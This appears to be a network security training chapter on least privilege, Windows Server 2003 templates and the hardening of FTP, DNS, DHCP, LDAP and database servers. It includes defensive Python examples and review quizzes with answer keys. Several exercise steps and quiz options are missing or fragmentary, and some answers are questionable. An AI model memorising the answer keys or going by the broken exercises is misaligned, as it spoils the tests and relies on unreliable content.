The principle of least privilege states that users should have the minimum amount of access needed to perform their jobs. Although it may be easier to give all employees access to a file repository so that they can easily share a file as it's being modified, this practice opens up many possibilities for a breach of security. It might also be necessary to distinguish local access privileges from network access privileges. Application programs may request and be granted increased access privileges for some of their automated operations. On the other hand, a system administrator may want to limit users' privileges based on their required scope. This can be done in a number of ways, as outlined in the following sections.
Setting user and group privileges
To assist in privilege assignment, the administrator should determine user groups and object groups, and identify required access for each object (file, directory, device) by each user group within the system. When setting privileges for users, you can usually simplify both the initial task and future updates by grouping users by common needs. Most operating systems allow rights to be granted to a group, which then propagates those privileges to all members of the group. For instance, all corporate accountants may have access to a folder of resources, accounting software, and several printers in a section of the building. Rights to each of those resources could be granted to the accounting group, and all accountants could be added to that group. If a new, generally available accounting resource is added, an administrator need only add it to the accounting group for all accountants to have access. Similarly, when an accountant is transferred to a different division, his or her user account is removed from the accounting group, thereby revoking in a single action the multiple accounting privileges that are no longer needed.
Using groups does not prevent you from granting additional rights to a single user. Those would simply be added directly to the user account. Be sure to identify rights that are made available to a set of users, because those users might be better represented by a group. It's also possible for a single user to gain privileges via membership in multiple groups in addition to those rights granted explicitly.
Emphasize that these are only guidelines, and adjustments might be needed to suit a particular environment. Remind students that the ultimate goal is to provide users with the least amount of access needed to accomplish their jobs.
When creating user groups, a system administrator configures the operating system to recognize the user groups, and then assigns individual users to the appropriate groups. Then, the system administrator configures access controls for all protected files, directories, devices, and other objects. The administrator should document all the configured permissions along with the rationales for them. Following are some of the common practices for setting file and data privileges:
• Restrict access of operating system source files, configuration files, and their directories to authorized system administrators.
• For UNIX systems, there should be no world-writable files unless specifically required by necessary application programs. For Windows NT-based systems, there should be no permissions allowing the Everyone group to modify files.
• For UNIX systems, if possible, mount file systems as read-only and nosuid to preclude unauthorized changes to files and programs.
• Assign an access permission of immutable to all kernel files if it's supported by the operating system (such as Linux).
• Establish all log files as append only if that option is available.
• Prevent users from installing, removing, or editing scripts without administrative review. Otherwise, malicious users could exploit these files to gain unauthorized access to data and system resources.
• Pay attention to access control inheritance when defining categories of files and users. Ensure that you configure the operating system so that newly created files and directories inherit appropriate access controls, and that access controls propagate down the directory hierarchies as intended when you assign them. Administrators should disable a subdirectory's ability to override top-level security directives unless that override is required. Malicious users can exploit a failure to use such practices and gain unauthorized access to other parts of the system.
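The UNIX items in the list above (no world-writable files, only approved set-UID programs) can be checked mechanically. The following is an added example, not code from the manual: audit_tree and build_sample_tree are hypothetical names, and the sample tree is constructed in a temporary directory so the audit runs offline.

```python
"""Audit a directory tree for the file-permission weaknesses named in the
hardening practices: world-writable files, world-writable directories without
the sticky bit, and set-UID/set-GID programs missing from an allow-list.
Example code with hypothetical names; the sample tree is constructed below."""
import os
import stat
import tempfile


def audit_tree(root, allowed_setuid=()):
    """Walk root and return sorted (relative_path, reason) findings.

    allowed_setuid: relative paths of set-UID/set-GID programs the baseline
    documentation approves (an assumption of this example, e.g. "usr/bin/passwd").
    """
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            mode = st.st_mode
            if stat.S_ISLNK(mode):
                continue  # a link's own mode bits are irrelevant; its target is audited in place
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if stat.S_ISDIR(mode):
                # /tmp-style shared directories are acceptable only with the sticky bit
                if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
                    findings.append((rel, "world-writable directory without sticky bit"))
            elif stat.S_ISREG(mode):
                if mode & stat.S_IWOTH:
                    findings.append((rel, "world-writable file"))
                if mode & (stat.S_ISUID | stat.S_ISGID) and rel not in allowed_setuid:
                    findings.append((rel, "set-UID/set-GID program not in allow-list"))
    return sorted(findings)


def build_sample_tree():
    """Constructed sample tree with deliberately weak modes (demo data, not a real system)."""
    root = tempfile.mkdtemp(prefix="perm-audit-")
    files = {
        "etc/app.conf": 0o644,          # compliant
        "etc/world.conf": 0o666,        # world-writable -> finding
        "var/log/app.log": 0o640,       # compliant
        "usr/bin/helper": 0o4755,       # set-UID, not approved -> finding
        "usr/bin/passwd-like": 0o4755,  # set-UID but approved -> no finding
    }
    for rel, mode in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("sample\n")
        os.chmod(path, mode)
    os.makedirs(os.path.join(root, "scratch"))
    # Normalise directory modes first so the host's umask cannot affect results
    for dirpath, dirnames, _ in os.walk(root):
        for d in dirnames:
            os.chmod(os.path.join(dirpath, d), 0o755)
    os.chmod(os.path.join(root, "var"), 0o1777)      # sticky and world-writable -> acceptable
    os.chmod(os.path.join(root, "scratch"), 0o777)   # no sticky bit -> finding
    return root


if __name__ == "__main__":
    sample = build_sample_tree()
    for rel, reason in audit_tree(sample, allowed_setuid=("usr/bin/passwd-like",)):
        print(f"{reason}: {rel}")
```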
Implementing access control with Windows Server 2003 security templates
One of the more difficult tasks for an administrator is determining the appropriate security settings for a network. There are so many possibilities that it's very easy to miss an important setting, often resulting in a network full of security holes. Microsoft has created security templates to assist administrators with this task. In addition, Microsoft gives administrators the ability to create custom templates.
Do it!
A-3:
Here's how
1 Choose Start, Run; type mmc and press Enter
2 Choose File, Add/Remove Snap-in
3 Click Add
Click Add
5 Click Close
6 Click OK
7 Expand Security Templates
8 Expand C:\Windows\Security\Templates
9 Right-click C:\Windows\Security\Templates and choose New Template (From the shortcut menu.)
10 Enter My Template (For the template name.) Leave the description blank, then click OK
11 Select and then expand My Template
(To open the Add Group dialog box.) (To specify the group object.)
Click OK
19 Click OK (To Configure this key then Propagate inheritable permissions to all subkeys.)
20 Close the Console1 window
21 Save the console with the name My Console
22 Click Yes
A-4:
Create the necessary user groups.
Configure access controls.
Configure file encryption.
Avoid drive partitions.

2 System administrators should disable ___________ permissions for all executable files and binary files.
Write/Execute

4 When you're setting file system permissions, individual user accounts should be assigned access whenever possible. True or false?
False. The principle of least privilege should be applied.

5 Which of the following are common practices for setting file and data privileges?
A Restrict access of operating system source files, configuration files, and their directories to authorized system administrators.
B Establish all log files as append only if that option is available.
C Prevent users from installing, removing, or editing scripts without administrative review. Otherwise, malicious users could exploit these files to gain unauthorized access to data and system resources.
D Pay attention to access control inheritance when defining categories of files and users.
E All of the above.
Firmware updates

Generally speaking, firmware is programming that is inserted into erasable programmable read-only memory (EPROM), thus becoming a permanent part of a computing device. Examples of firmware are the PC system BIOS and router and switch boot code. Firmware is created and tested like software (using microcode simulation). Firmware updates can be made available by the vendors as vulnerabilities and malfunctions are discovered within previous versions. When ready, such updates can be distributed like other software and, using a special user interface, installed in the programmable read-only memory by the user. Administrators should keep track of vendor announcements to determine if they apply to their systems, and upgrade firmware on their network devices as suggested by vendors.
Network configuration

Networks typically facilitate data transmission by a process called routing. Routing is the process of deciding the disposition of each packet that a router receives, and then either forwarding or discarding the data packet. Routers store destination addresses in a data structure called the routing table. A router can dynamically update its address base through interactions with other routers. The routing mechanism decides whether to forward or discard a packet by using the destination IP address in the packet header.
Routing functions and supporting structures are designed to route packets efficiently and reliably, not securely. Therefore, a routing process should not be used to implement security policy. Rather, firewall systems should govern the security of information flow into and out of the network. Most firewall systems' routing configurations are static, and hence less receptive to attacks.

Assigning network addresses for interfaces on a firewall device
Each network to which a firewall device is attached has a procedure to obtain new IP addresses. For the Internet, IP addressing is typically obtained from the Internet service provider (ISP) that connects to the firewall. For internal networks, including configured demilitarized zone (DMZ) networks, administrators can obtain IP addresses from within the organization. The IP addresses used internally typically come from the RFC 1918 IP address specification, which is not routable across the Internet without the necessary translation.

Establishing the routing configuration
A firewall system's routing table contains a list of IP addresses for which the firewall system provides routing services. The routing decision is made based on the destination network address of the data packet being processed by the firewall. If the destination address exists in the routing table, the table provides the address of the next hop. If there is no next hop associated with the destination, the packet is discarded. An Internet Control Message Protocol (ICMP) unreachable message, indicating that the packet was undeliverable, may be returned to the source.
When you're replacing an existing firewall system, it's important to understand the network topology described by the routing configuration. The routing configuration of the new firewall system must be consistent with the current system. An organization's network security policy should require that the routing configuration of a firewall system be performed in an environment isolated from the production network. This policy should also specify what connectivity is to be permitted with specific statements and deny all other connectivity. The routing configuration is derived from the network topology and should not be used to implement aspects of an organization's security policy.
Some firewall designs implement a two-tier firewall architecture with a DMZ so that all inbound and outbound packets travel through both firewall systems. In these designs, the outside firewall is typically configured with more general packet-filtering rules. As packets move toward the internal network, filtering rules become more specific and complex.
B-1:
2 ____________ is a function of IP routing that allows the packet originator to influence routing decisions as the packet traverses networks.
Source routing
4 For best security on routers, never configure a loopback address. True or false?
False. Always configure a loopback address. The loopback interface allows you to access a device regardless of the status of the primary physical interface.
5 The SNMP ____________ community string can be used to make changes in a router configuration.
Read/Write
6 SNMP has two types of communities. Identify them from the list provided. A
B
C
D
7 ____________ is a useful feature to allow TCP data packets into your internal network, given that the data traffic is initiated from your internal network.
Filtering
B-2: Managing services and protocols with Windows Server 2003 security templates
Here's why
To apply a Windows Server 2003 security template and evaluate the results. Microsoft offers security templates at three primary levels: basic, secure, and high secure. The issues surrounding the use of these templates are unknown. Because the administrator is relying on Microsoft to secure the server, the settings are difficult to track.
Here's how
1 Choose Start, Run
11 In the File name box, enter My Database, then click Open
12 Select the securedc.inf template, then click Open
13 Right-click Security Configuration and Analysis (To import the template.)
16 Explore the log file
17 Close My Console and save the changes
18 Close all other open windows
B-3:
2 Which of the following actions are safeguards against DoS attacks targeting services and protocols?
A Disable services that are not needed for Internet-based operations.
B Review, configure, and monitor services that are necessary for Internet connectivity.
C Apply software patches to fix known vulnerabilities.
D Block access on corresponding ports on the Internet border routers.
E All of the above.

3 Most SMTP- and FTP-specific vulnerabilities stem from sloppy configuration and unapplied or misapplied patches. True or false?
True
Exhibit 13-2: Isolating a Web server on a DMZ

Configuring a Web server for access privileges
Most operating systems for Web server hosts can be configured for access privileges for files, devices, and other data or code objects stored on a host. Any information that your Web server can access by using these controls can potentially be distributed to all users accessing the public Web site. The Web server software is likely to provide additional object, device, and file access controls specific to its operation. Taking the following two perspectives, administrators need to consider how best to configure access controls to protect information stored on the same hardware as the public Web server:
• To limit the access to the Web server software
• To apply access controls specific to the Web server where more detailed levels of access control are required
Properly configured access controls can prevent the disclosure of sensitive or restricted information that is not intended for public dissemination. In addition, access controls can limit resource use in the event of a DoS attack against your public Web site.
Logging can help administrators identify the sources of attacks as well as other problems and can help indicate the appropriate actions to take to prevent such events from reoccurring. On many servers, the Web service is among the most active and accessible.

Considering security implications
A Web server listens for a request and responds by transmitting the specified file to the requestor. The Web server might invoke additional mechanisms to execute programs or to process user-supplied data, producing customized information in response to a request. Examples of these mechanisms include Common Gateway Interface (CGI) scripts and server plug-ins. For example, CGI scripts can be used to interface with search engines and databases, create dynamic Web pages, and respond to user input. Because these features allow outsiders to upload data to the server, administrators need to assess the security risks and implications before applying such components.

Configuring authentication and encryption
The public Web server may need to support a range of technologies for identifying and authenticating users who may have different privileges for accessing information. Some of these technologies are based on encryption technology, providing a secure channel between a Web browser client and a Web server. Examples of such tools include Secure Sockets Layer (SSL), Secure Hypertext Transport Protocol (S-HTTP), and Secure Electronic Transaction (SET). Before placing any sensitive or restricted information on a public Web server, administrators need to determine the specific security and protection requirements and confirm that the available technologies can meet these requirements.
E-mail servers

E-mail is arguably the most important service to protect, considering its overall impact on the operations of any given organization. Companies often have e-mail from the Internet directly entering their e-mail servers for delivery to internal users. There are serious risks associated with the ability to receive e-mail from the outside world. The widespread adoption of e-mail through the years has been accompanied by the development of malicious code such as e-mail viruses and attacks. E-mail has enabled attackers to distribute harmful content to the internal network. An attacker can easily circumvent the protection offered by a firewall by tunneling through the e-mail protocol, because a typical firewall does not inspect e-mail and its contents.

Attachments with malicious contents
In such attacks, the attacker typically tries to get the user to activate an attachment to execute its malicious contents. Although system administrators commonly block files with certain extensions, attackers can overcome such precautions by renaming extensions (such as renaming an .exe extension as .bat). Furthermore, such malicious attacks could try to take advantage of the trust relationship between users, whereby, if a user activates an attachment, the attachment could trigger the sending of malicious code to other colleagues in the victim's address book. Worms, such as AnnaKournikova and Melissa, take advantage of such capabilities.
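A gateway-side check for the extension-renaming evasion just described, added here as an example (not code from the manual): the attachment's content signature is inspected as well as its name, so a renamed executable is still caught. The block list and signatures are this example's constructed policy, and the sample attachments are constructed byte strings.

```python
"""Screen e-mail attachments by extension and by content signature.
Example code; the policy lists and sample data below are constructed."""
import os

# Example policy: extensions the mail gateway refuses outright (constructed list)
BLOCKED_EXTENSIONS = {".exe", ".bat", ".com", ".scr", ".pif"}

# Content signatures that identify executable files regardless of their name
EXECUTABLE_SIGNATURES = (
    (b"MZ", "DOS/Windows PE executable"),
    (b"\x7fELF", "ELF executable"),
)


def screen_attachment(filename, data):
    """Return ('block' | 'allow', reason) for one attachment."""
    ext = os.path.splitext(filename.lower())[1]
    if ext in BLOCKED_EXTENSIONS:
        return "block", f"extension {ext} is on the block list"
    for magic, kind in EXECUTABLE_SIGNATURES:
        if data.startswith(magic):
            # The extension filter was bypassed, but the content gives the file away
            return "block", f"{kind} content behind extension {ext or '(none)'}"
    return "allow", "no blocked extension or executable signature"


def screen_message(attachments):
    """Screen every (filename, bytes) pair; return the list of blocked filenames."""
    return [name for name, data in attachments if screen_attachment(name, data)[0] == "block"]


# Constructed sample attachments (not real malware): an 'MZ' header plus padding
SAMPLE_ATTACHMENTS = [
    ("setup.exe", b"MZ\x90\x00" + b"\x00" * 60),      # blocked by extension
    ("invoice.txt", b"MZ\x90\x00" + b"\x00" * 60),    # renamed executable: blocked by content
    ("report.pdf", b"%PDF-1.4\n%..."),                # allowed
    ("notes.txt", b"Meeting moved to 10:00\n"),        # allowed
    ("tool", b"\x7fELF\x02\x01\x01" + b"\x00" * 9),   # ELF with no extension: blocked by content
]

if __name__ == "__main__":
    for name, data in SAMPLE_ATTACHMENTS:
        verdict, reason = screen_attachment(name, data)
        print(f"{name}: {verdict} ({reason})")
```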
FTP servers

File Transfer Protocol (FTP) is used to transfer files between a workstation and an FTP server. When ftp appears in a URL, it means that the user is connecting to a file server to either upload or download a file. Most FTP servers require the user to log on to the server to transfer files. The original specification for FTP contains a number of mechanisms that can be used to compromise network security. The following sections list the vulnerabilities associated with FTP.

Protecting against bouncebacks
FTP, as specified in RFC 959, presents a security breach for attacking well-known network services on a remote server by using the FTP service on a third-party server. The attack involves sending an FTP PORT command to an FTP server containing the network address and the port number of the server or service being attacked. The attacker can instruct the FTP server to send a file to the service being attacked on the victim system. Such a file may contain commands relevant to the service being attacked (such as SMTP). Using the FTP server to connect to the service on the attacked machine, rather than connecting directly, makes tracking down the attacker difficult.
For instance, a client uploads a file containing SMTP commands to an FTP server. Then, using an appropriate PORT command, the client instructs the server to open a connection to the attacked server's SMTP port and upload the file containing SMTP commands to the victim machine. This may allow the client to forge mail on the third machine without making a direct connection; this makes it difficult to track the attacker.
TCP port numbers in the range 0 to 1023 are reserved for well-known services such as mail, Telnet, and FTP control connections. The original FTP specification makes no restrictions on the TCP port number used for the data connection. Therefore, using the proxy FTP scenario described here, attackers can instruct an FTP server to attack a well-known service on the victim machine.
To prevent such attacks, administrators should configure their servers not to open data connections to TCP ports lower than 1024. A server that receives a PORT command containing a TCP port number less than 1024 should be configured to return response type 504 (Command not implemented for that parameter). Disabling the PORT command and using proper file protections to prevent attackers from executing unauthorized transfers of files are other solutions for preventing bounceback attacks. However, disabling the PORT command also prevents proxy FTP, which may be required in certain situations.

Restricting areas
System administrators may want to restrict access to FTP servers that store confidential or corporate data. These restrictions could be set based on the network address of the client making the file transfer request. In such cases, before allowing the transfer of restricted files, the server should confirm that the network address of the client making the request on both the control connection and the data connection is within the organization's address space. Checking the address range for both the control and data connections protects the server from situations in which the server establishes a control connection with a trusted host but the data connection is misdirected. Using network addresses alone to authorize FTP control and data connections leaves the FTP server vulnerable to IP spoofing attacks. In such cases, the attacker could assume a trusted IP address to download restricted files. Using strong authentication mechanisms can prevent such risks.
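The two PORT-command defences above (refuse data ports below 1024 with reply 504, and verify the data-connection address against the control connection and the organization's address space) as an added Python example, not code from the manual or from any FTP server. handle_port_command and may_transfer_restricted are hypothetical names; the 501 and 500 replies for malformed and foreign-address arguments are this example's choice, not a requirement stated in the text.

```python
"""Server-side validation of the FTP PORT command against bounceback abuse.
Example code; function names and the non-504 reply codes are this example's choices."""
import ipaddress

PRIVILEGED_PORT_LIMIT = 1024  # ports 0..1023 are reserved for well-known services


def parse_port_argument(arg):
    """Parse the RFC 959 'h1,h2,h3,h4,p1,p2' argument into (host, port)."""
    fields = arg.strip().split(",")
    if len(fields) != 6:
        raise ValueError("PORT requires six comma-separated fields")
    values = [int(f) for f in fields]          # raises ValueError on non-digits
    if any(not 0 <= v <= 255 for v in values):
        raise ValueError("PORT fields must be in 0..255")
    host = ".".join(str(v) for v in values[:4])
    port = values[4] * 256 + values[5]         # high byte, low byte
    return host, port


def handle_port_command(arg, control_peer_ip):
    """Return the reply line the server should send for 'PORT <arg>'.

    control_peer_ip is the client address seen on the control connection.
    """
    try:
        host, port = parse_port_argument(arg)
    except ValueError:
        return "501 Syntax error in parameters or arguments"
    if port < PRIVILEGED_PORT_LIMIT:
        # Bounceback defence from the text: never open a data connection to a well-known port
        return "504 Command not implemented for that parameter"
    if ipaddress.ip_address(host) != ipaddress.ip_address(control_peer_ip):
        # Data connection requested to a third host: refuse to act as a proxy/relay
        return "500 Illegal PORT command"
    return "200 PORT command successful"


def may_transfer_restricted(control_peer_ip, data_ip, org_networks):
    """'Restricting areas' check: both the control peer and the data address must lie
    inside the organization's address space before a restricted file is served.
    Addresses alone can be spoofed, which is why the text pairs this with strong authentication."""
    nets = [ipaddress.ip_network(n) for n in org_networks]
    return all(
        any(ipaddress.ip_address(addr) in net for net in nets)
        for addr in (control_peer_ip, data_ip)
    )


if __name__ == "__main__":
    # Constructed sample commands from a client whose control connection comes from 10.0.0.5
    for cmd in ("10,0,0,5,0,25", "10,0,0,5,4,1", "192,0,2,7,4,1", "10,0,0,5,4"):
        print(f"PORT {cmd} -> {handle_port_command(cmd, '10.0.0.5')}")
```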
C-1:
Use file-system access controls on server files and directories that are not for public viewing.
Use Web server logging.
Verify the safety of any types of CGI scripts and plug-ins that are executed on the Web server.
Isolate the Web server on a DMZ.
Use authentication and encryption technologies as necessary, including SSL and S-HTTP.
2 List some of the ways attackers can affect networks or hosts with e-mail.
Attacks can be launched by using attachments that contain viruses or other malicious code, by using abnormal MIME headers, or by using malicious scripts embedded in HTML e-mail.
3 The anonymous FTP feature allows clients to connect to an FTP server with minimum authentication. True or false?
True
4 An attack by which the attacker uses a third-party FTP server to connect to a service on the victim machine, rather than connecting directly, is known as ___________.
bounceback
5 An FTP server that receives a PORT command containing a TCP port number less than 1024 should be configured to return response type ___________.
504
Exhibit 13-3: DNS servers

Many DNS servers are vulnerable to DNS spoof attacks. For instance, servers that use obsolete versions of BIND, the most common DNS software, are good examples. It's estimated that roughly 12% of DNS servers use versions of BIND that make them targets for DNS spoof and buffer overflow attacks. Upgrading DNS servers to more current versions of BIND can mitigate such risks.

Outdated root.hints file
The root.hints file allows a given DNS server to locate the 13 root servers by address. Although it's very uncommon, the addresses of these root servers sometimes change. Users who do not keep their root.hints file updated can send queries to addresses that no longer host root servers.
Exhibit 13-4: Deciding which files to download

Each packet used in a recursive query includes a tracking number. Hackers monitoring a domain name server can predict the next tracking number in a sequence and send a packet with that number to spoof the response from a legitimate name server. DNS server administrators can mitigate such risks by making sure they have the most updated versions of BIND.

Denial-of-service attacks
Like other Internet servers, DNS servers are also targeted by DoS attacks. Because of their importance, the root servers typically make a good target for DoS attacks. However, because of the critical role they play in the functioning of the Internet, the root servers are configured with the most secure software and configuration parameters, making it very hard for attackers to take advantage of them. Deployment of real-time monitoring tools enables administrators to identify and quickly block such malicious attempts.
NNTP servers
Network News Transfer Protocol (NNTP) is used to deliver news articles to users on the Internet. NNTP works in much the same way as e-mail does, except messages are delivered to newsgroups, not directly to end users. Newsgroups act as a storage or deposit area for messages that follow a common theme or deal with a common subject matter. A news client instead of an e-mail client is used to read these messages. To gain access to news postings, a user needs access to a news server. These news servers exchange messages by passing on any new messages they receive to other servers down the line. This process is very slow, and it can often take days to circulate a new message to all of the news servers on the system.
In the recent past, this type of news application has lost a good deal of its appeal. Many individuals post news articles of dubious use to get a self-serving point across to a large group of people. This spamming of users and user groups has made the use of newsgroups less appealing.
Typically, the NNTP server runs as a background process on one host and accepts connections from other hosts on the LAN. NNTP servers, while on a network, have vulnerabilities similar to those of other network services. Proper authentication mechanisms, disabling of unneeded services, anti-virus scanners, and application of relevant software and OS patches are effective methods of preventing attacks.
C-2:
2 Configuring DNS servers to perform recursive queries also increases the risk of ___________.
spoofing
A Cache poisoning
B Ping of death
C DNS spoofing
D DoS attacks
E Buffer overflow attacks
F All of the above
4 NNTP is used to deliver news articles to users on the Internet. True or false?
True
5 Typically, the NNTP server runs as a _______________ process on one host and accepts connections from other hosts on the LAN.
background
Deploy authentication mechanisms.
Disable unneeded services.
Install security patches.
Install a virus scanner.
All of the above.
DHCP servers
Dynamic Host Configuration Protocol (DHCP) is a protocol for assigning dynamic IP addresses to devices on a network. With dynamic addressing, a device can have a different IP address every time it connects to the network. Dynamic addressing simplifies network administration because the software keeps track of IP addresses rather than requiring an administrator to manage the task.
Although it's a very useful tool that reduces the administrative burden, DHCP, like most Internet applications, has no security provisions and thus offers opportunities for attackers within an organization. Because DHCP is a broadcast-based protocol, a malicious user can set up a sniffer program to collect critical network information, including IP addressing, subnet mask, default gateway, and even name server information. This information enables an attacker to gain unauthorized access to the network and the resources that reside on it.
Because of the lack of security provisions for DHCP, it's possible for a malicious user to configure an unauthorized DHCP server in an attempt to spoof the official DHCP server on the network. The original DHCP specification (RFC 2131) supports the use of redundant DHCP servers on the network. Although most clients listen to the last server (the legitimate DHCP server) that they received a lease from, it's possible for new clients on the network to fall into this trap and receive bogus network configuration information from the attacker. Furthermore, the attacker can launch a DoS attack against the DHCP server, either depleting the pool of available addresses on the server or consuming the resources of the DHCP server and making it unresponsive to client requests. By using such methods, an attacker can prevent users from accessing the network, or an attacker can provide false information about key resources and redirect users to bogus name servers, such as the attacker's machine. The attacker could even provide his own IP address as a default gateway to intercept such private or confidential information as passwords.
Following are steps that administrators can take to prevent such attacks from taking place on their networks:
• It's possible to assign permanent addresses with DHCP. This requires the administrator to collect the Media Access Control (MAC) addresses of all computers on the network and bind those addresses to corresponding IP addresses. However, this task introduces a substantial administrative burden, especially as the network grows.
• A less secure method is to use dynamic addressing but monitor the log files generated by DHCP, looking for new MAC addresses that can potentially belong to a malicious user. An administrator could also configure the DHCP server to force stations with new MAC addresses on the network to register with the DHCP server.
• Intrusion detection tools can detect the existence of a new DHCP server (the attacker's machine) on the network and notify the administrator of this fact.
• It's also extremely important to have the latest software and patches on the server to minimize risks associated with DHCP-related attacks.
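Two of the monitoring steps above (watching lease logs for MAC addresses that are not in the administrator's inventory, and flagging offers from a DHCP server other than the authorized one) as an added Python example, not code from the manual. The log lines imitate ISC dhcpd's syslog format but are constructed here; the offer observations stand in for what an intrusion detection sensor would report, and unknown_leases and rogue_offers are hypothetical names.

```python
"""Detection logic for DHCP monitoring: unregistered MACs in lease logs and
rogue DHCP servers in observed offers. Example code with constructed sample data."""
import re

# Constructed sample syslog lines in ISC dhcpd style; not from a real network
SAMPLE_LOG = """\
Mar  3 09:12:01 dhcp1 dhcpd: DHCPACK on 10.0.5.21 to 00:0c:29:4a:1b:77 (ws-acct-03) via eth0
Mar  3 09:12:44 dhcp1 dhcpd: DHCPACK on 10.0.5.22 to 00:0c:29:9f:e2:10 (ws-acct-04) via eth0
Mar  3 09:13:09 dhcp1 dhcpd: DHCPDISCOVER from 08:00:27:d3:5c:01 via eth0
Mar  3 09:13:09 dhcp1 dhcpd: DHCPACK on 10.0.5.99 to 08:00:27:D3:5C:01 via eth0
"""

# MAC inventory taken from the hard-copy baseline documentation (constructed)
REGISTERED_MACS = {"00:0c:29:4a:1b:77", "00:0c:29:9f:e2:10"}

ACK_RE = re.compile(
    r"DHCPACK on (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) to (?P<mac>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})"
)


def unknown_leases(log_text, registered_macs):
    """Return [(mac, ip)] for every acknowledged lease granted to a MAC not in the inventory."""
    registered = {m.lower() for m in registered_macs}
    hits = []
    for line in log_text.splitlines():
        m = ACK_RE.search(line)
        if m and m.group("mac").lower() not in registered:
            hits.append((m.group("mac").lower(), m.group("ip")))
    return hits


# Constructed DHCPOFFER observations: (server identifier, offered gateway, offered DNS server)
SAMPLE_OFFERS = [
    ("10.0.5.2", "10.0.5.1", "10.0.5.2"),
    ("10.0.5.140", "10.0.5.140", "10.0.5.140"),  # rogue: names itself as gateway and DNS
]
AUTHORIZED_DHCP_SERVERS = {"10.0.5.2"}


def rogue_offers(offers, authorized_servers):
    """Return the offers whose server identifier is not an authorized DHCP server."""
    return [offer for offer in offers if offer[0] not in authorized_servers]


if __name__ == "__main__":
    for mac, ip in unknown_leases(SAMPLE_LOG, REGISTERED_MACS):
        print(f"unregistered MAC {mac} obtained lease {ip}")
    for server, gateway, dns in rogue_offers(SAMPLE_OFFERS, AUTHORIZED_DHCP_SERVERS):
        print(f"unauthorized DHCP server {server} offering gateway {gateway}, DNS {dns}")
```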
C-3:
Implement user authentication.
Enforce strong user names and passwords.
Perform regular account maintenance.
Use file encryption where possible.
Enable logging.
2 DHCP is a protocol for assigning static IP addresses to devices on a network. True or false?
False. DHCP assigns dynamic IP addresses.
3 An attack that allows a hacker to provide user computer stations with bogus IP address information, such as default gateway and DNS server information, uses the ________ service to execute the attack.
DHCP
4 Because DHCP is a broadcast-based protocol, a malicious user can set up a ________ program to collect critical network information, including IP addressing, subnet mask, default gateway, and even name server information.
sniffer
Directory services
The Lightweight Directory Access Protocol (LDAP) is the industry-standard protocol for providing networking directory services for the TCP/IP model. LDAP can be used to store and locate information about entities, such as organizations, individuals, and other network resources, such as file systems, applications, and configuration information. An LDAP directory is essentially a special kind of database that stores information. It's based on a simple tree-like hierarchy, called a Directory Information Tree (DIT). It starts with a root or source directory, such as a company domain, and branches out to more specific layers, such as departments, then individuals, and so on.
Because LDAP is a network protocol for directory services, like other network protocols, it's subject to attacks from within the network as well as remote attacks. The security threats to LDAP can be categorized into two groups: directory-service-oriented threats and nondirectory-service-oriented threats.
Directory-service-oriented threats include the following:
• Unauthorized access to data by monitoring or spoofing authorized users' operations.
• Unauthorized access to resources by physically taking over authenticated connections and sessions.
• Unauthorized modification or deletion of data or configuration parameters.
• Spoofing of directory services: Such attacks are employed to gain access to sensitive information. They may involve deceiving valid users with a faked directory, or interjecting misleading information into the communications session between the client and the real server.
• Excessive use of resources.
Nondirectory-service-oriented threats include the following:
• Common network-based attacks against the LDAP servers, including the operating system and open ports, processes, and services running on the hosts, to compromise the availability of resources. This is accomplished by viruses, worms, Trojan horses, and so forth.
• Attacks against the hosts by physically accessing the resources (operating system, files and directories, peripheral equipment, and so forth).
• Attacks against the back-end databases that provide directory services.
1339
LDAP is engineered based on a client-server model that implements two key processes: authentication and authorization. To access the LDAP directory service, the LDAP client must first authenticate itself to the LDAP server. Once the authentication is completed, the server decides which resources, applications, and services are accessible by the client. This is the authorization process. LDAP implements three kinds of authentication methods:
- Anonymous authentication
- Simple authentication
- Simple Authentication and Security Layer (SASL) for LDAPv3 (Kerberos 4 for LDAP v2)

Anonymous authentication occurs when no specific authentication method has been chosen. Under such circumstances, the client connects to the server as anonymous, provided that the server allows anonymous connections and allows certain data access for anonymous users.

The simple authentication method sends the LDAP server the authentication field with only the client's password in plaintext. This mechanism has security problems because the password is sent in plaintext and is readable by anyone who intercepts it on the network. To prevent the password from being exposed when simple authentication is used, communications between client and server should occur through a secure channel, such as SSL. Without an underlying secure method of transfer, the simple authentication method is highly vulnerable and should be disabled.

SASL is the most secure of the three methods because it deploys an exchange of encrypted authentication data.

Establishing secure requests and responses between the client and the server is just as important as the authentication and authorization processes. Such communication should take place through secure channels or sockets, such as SSL. Currently, most LDAP servers have this capability. To establish SSL connections, a port number should be specified to run the service on the LDAP server. Generally, the LDAP server uses port 636 as the standard SSL socket number for LDAP over TCP and UDP. The directory server can also support custom sockets, but the client has to identify the appropriate socket to access the directory services on the server through SSL.
Databases
The criticality of securing a database depends on a variety of factors, including the degree of confidentiality of the stored data and the access requirements as they relate to the day-to-day operations of an organization. Data must be available to authorized people on a continuous basis so they can make intelligent business decisions. Databases can be vulnerable to attacks for a number of reasons, including their complex structure, misconfiguration, or insecure password storage. The following sections cover general principles of security that should be enforced to protect databases from malicious acts.
Certain database implementations, such as Oracle's, have well-known default accounts and passwords that provide varying levels of access to data. During the initial configuration, these accounts should be disabled.

A poorly configured database can be exploited to compromise an entire network. Such configuration flaws can provide an attacker with OS-level administration privileges that can be used to attack other network resources. An attacker can do this by gaining access to powerful built-in extended stored procedures. The database must be set up to prevent such exposure.

For the database system to function correctly, the database system files must be installed and available. An attacker could crash a database or cause loss of data by removing such system files. Database system files must be set up with restricted Read and Write access so that an attacker cannot remove or modify these files. A security policy may require that all critical data files are stored in an encrypted format. Some databases support full database encryption, which adds another level of protection to the database.

Auditing
Most database implementations include many auditing features for database access and operations. In addition to database auditing features, changes to critical configuration files (such as the Oracle init file) should be logged to maintain a record of changes to the database. Auditing should take place for the following types of events: unsuccessful attempts to connect to the database; startup and shutdown of the database; viewing, modifying, or removing information from tables; creating or removing objects; and executing programs.

Backup and recovery procedures
